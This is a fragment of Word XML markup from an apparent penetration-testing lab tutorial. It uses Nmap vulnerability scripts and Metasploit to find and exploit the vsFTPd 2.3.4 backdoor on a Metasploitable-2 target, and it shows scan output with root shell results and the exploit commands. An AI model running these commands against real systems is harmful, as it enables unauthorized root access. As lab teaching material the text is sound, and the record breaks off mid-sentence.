      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gathering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>task.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="9474" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="155"/>
        <w:ind w:left="399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msf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&gt;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nmap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-v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192.168.0.3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--script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vuln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-3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-Pn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-2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-O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line="252" w:lineRule="auto" w:before="170"/>
        <w:ind w:left="185" w:right="388" w:firstLine="298"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Nmap output </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>contained over 600 lines; therefore, the output was shortened, leaving relevant information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46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explained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="185" w:right="144" w:firstLine="298"/>
      </w:pP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following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>lines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>us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initialized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>scans</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>types,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involve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>NSE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Scan,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>resolution,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7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Stealth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Scan.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4.980003pt;margin-top:9.363259pt;width:453.8pt;height:71.75pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15712768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msf6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&gt;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db_nmap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-v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--script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vuln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</w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:right="1427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Starting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7.70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https://nmap.org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)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2020-02-04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16:56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-03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Loaded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103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scripts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for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scanning.</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="2"/>
                    <w:ind w:right="5136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8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NSE:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-8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Script</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-7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Pre-scanning.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16:56</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="244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16:57,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10.00s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15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="399"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="width:453.8pt;height:107.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#e5e5e5" stroked="false">
            <w10:anchorlock/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</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:right="3882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16:57,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0.00s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ARP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Ping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</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="23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Scanning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[1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port]</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="6"/>
                    <w:ind w:right="1427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ARP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Ping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16:57,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0.05s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(1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total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hosts)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Parallel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DNS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resolution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of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host.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</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="1"/>
                    <w:ind w:right="639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Parallel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DNS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resolution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of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host.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16:57,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0.02s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SYN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Stealth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</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="244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Scanning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[1000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ports]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131"/>
        <w:ind w:left="484"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>extract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>what</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>services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target: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4.980003pt;margin-top:9.896695pt;width:453.8pt;height:286.95pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15711744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25/tcp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</w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:right="3321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 Nmap: Discovered open port 80/tcp on 192.168.0.3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445/tcp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139/tcp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3306/tcp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5900/tcp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22/tcp on 192.168.0.3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53/tcp on 192.168.0.3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111/tcp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21/tcp on 192.168.0.3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23/tcp on 192.168.0.3</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="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1099/tcp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512/tcp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1524/tcp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513/tcp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 Nmap: Discovered open port 514/tcp on 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2121/tcp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6000/tcp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2049/tcp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6667/tcp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8009/tcp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5432/tcp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Discovered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8180/tcp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on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</w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="4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SYN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Stealth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16:57,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0.12s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(1000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total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ports)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39"/>
        <w:ind w:left="484"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following extract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>report NSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>post scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scripts execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to find vulnerabilities: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4.980003pt;margin-top:9.900695pt;width:453.8pt;height:95.65pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15711232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Script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scanning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192.168.0.3.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16:57</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:right="3882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17:02,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322.44s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Initiating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17:02</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="2"/>
                    <w:ind w:right="3882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Completed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NSE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17:02,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0.74s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elapsed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scan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report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for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192.168.0.3</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="1"/>
                    <w:ind w:right="4615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Host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is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(0.00075s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latency).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Not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shown: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977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closed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2" w:lineRule="auto" w:before="139"/>
        <w:ind w:left="185" w:right="388" w:firstLine="298"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr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see,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>already</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>holes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vulnerabilities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target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>service,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even</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>links</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>us</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploits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hack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target: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4.980003pt;margin-top:9.35816pt;width:453.8pt;height:47.85pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15710720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tabs>
                      <w:tab w:pos="1788" w:val="left" w:leader="none"/>
                    </w:tabs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PORT</w:t>
                    <w:tab/>
                    <w:t>STATE</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-4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SERVICE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3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21/tcp</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="8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open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="38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ftp</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                    <w:ind w:right="5450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10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9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|</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-10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ftp-vsftpd-backdoor:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-10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[*]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Nmap:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-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|</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="6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VULNERABLE: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ind w:left="399"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="width:459.3pt;height:205pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="0,0" coordsize="9186,4100">
            <v:shape style="position:absolute;left:0;top:35;width:9076;height:4065" coordorigin="0,35" coordsize="9076,4065" path="m9075,2904l0,2904,0,3143,0,3383,0,3622,0,3861,0,4100,9075,4100,9075,3861,9075,3622,9075,3383,9075,3143,9075,2904xm9075,1470l0,1470,0,1709,0,1948,0,2187,0,2426,0,2665,0,2904,9075,2904,9075,2665,9075,2426,9075,2187,9075,1948,9075,1709,9075,1470xm9075,35l0,35,0,274,0,513,0,752,0,991,0,1231,0,1470,9075,1470,9075,1231,9075,991,9075,752,9075,513,9075,274,9075,35xe" filled="true" fillcolor="#e5e5e5" stroked="false">
              <v:path arrowok="t"/>
              <v:fill type="solid"/>
            </v:shape>
            <v:shape style="position:absolute;left:0;top:0;width:9186;height:4100" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="1506" w:val="left" w:leader="none"/>
                      </w:tabs>
                      <w:spacing w:line="223" w:lineRule="auto" w:before="16"/>
                      <w:ind w:left="0" w:right="4434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SimSun"/>
                        <w:spacing w:val="7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vsFTPd</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun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version</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun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2.3.4</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun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backdoor</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun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State:</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSu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VULNERABLE</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSu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(Exploitable)</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="1506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IDs:</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun"/>
                        <w:spacing w:val="3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OSVDB:73573</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSu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CVE:CVE-2011-2523</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="1506" w:val="left" w:leader="none"/>
                        <w:tab w:pos="1694" w:val="left" w:leader="none"/>
                      </w:tabs>
                      <w:spacing w:line="223" w:lineRule="auto" w:before="6"/>
                      <w:ind w:left="0" w:right="898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ab/>
                      <w:t>vsFTPd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version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2.3.4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backdoor,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this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was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reported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SimSu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2011-07-04.</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun"/>
                        <w:spacing w:val="-10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Disclosure</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSu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date:</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSu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2011-07-03</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="1506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Exploit</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSu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results:</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="1694" w:val="left" w:leader="none"/>
                      </w:tabs>
                      <w:spacing w:line="239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Shell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command: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id</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="1506" w:val="left" w:leader="none"/>
                        <w:tab w:pos="1694" w:val="left" w:leader="none"/>
                      </w:tabs>
                      <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                      <w:ind w:left="0" w:right="4141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ab/>
                      <w:t>Results:</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSu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uid=0(root)</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSu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gid=0(root)</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun"/>
                        <w:spacing w:val="-10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  <w:t>References:</w:t>
                    </w:r>
                  </w:p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</w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="1694" w:val="left" w:leader="none"/>
                      </w:tabs>
                      <w:spacing w:line="223" w:lineRule="auto" w:before="5"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="398"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                    <w:hyperlink r:id="rId26">
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="SimSun"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html</w:t>
                      </w:r>
                    </w:hyperlink>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun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  <w:tab/>
                    </w:r>
                    <w:hyperlink r:id="rId27">
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="SimSun"/>
                          <w:w w:val="105"/>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>http://osvdb.org/73573</w:t>
                      </w:r>
                    </w:hyperlink>
                  </w:p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</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="239" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="398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sz w:val="20"/>
                      </w:rPr>
                      <w:t>https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="239" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="398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4"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>\</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="239" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="1412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/vsftpd_234_backdoor.rb</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="1694" w:val="left" w:leader="none"/>
                      </w:tabs>
                      <w:spacing w:line="248" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSun"/>
                        <w:w w:val="105"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>[*]</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSu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Nmap:</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="SimSu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SimSun"/>
                        <w:w w:val="105"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>|_</w:t>
                      <w:tab/>
                      <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523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147" w:after="0"/>
        <w:ind w:left="746" w:right="0" w:hanging="562"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Preparation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="127"/>
        <w:ind w:left="185" w:right="388"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Once you identified security holes on your target use Metasploit commands to find proper exploits against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>them. As you saw previously one of the first vulnerabilities found was on the vsFTPD server, to find proper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploits. As you see Metasploit contains a backdoor which possibly may help us to hack our target FTP. To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use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exploit,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>within</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>run: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74.980003pt;margin-top:9.436445pt;width:453.8pt;height:35.9pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15709696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msf6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&gt;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use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exploit/unix/ftp/vsftpd_234_backdoor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msf6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exploit(/unix/ftp/vsftpd_234_backdoor)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&gt;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show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options</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="248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msf6</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-6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exploit(/unix/ftp/vsftpd_234_backdoor)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&gt;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set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RHOSTS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[Metasploitable-2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IP</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="SimSun"/>
                      <w:spacing w:val="-5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Address]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1"/>
          <w:numId w:val="4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562"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Exploiting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tabs>
          <w:tab w:pos="9474" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="185" w:firstLine="214"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>msf6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exploit(/unix/ftp/vsftpd_234_backdoor)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&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="170"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploiting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
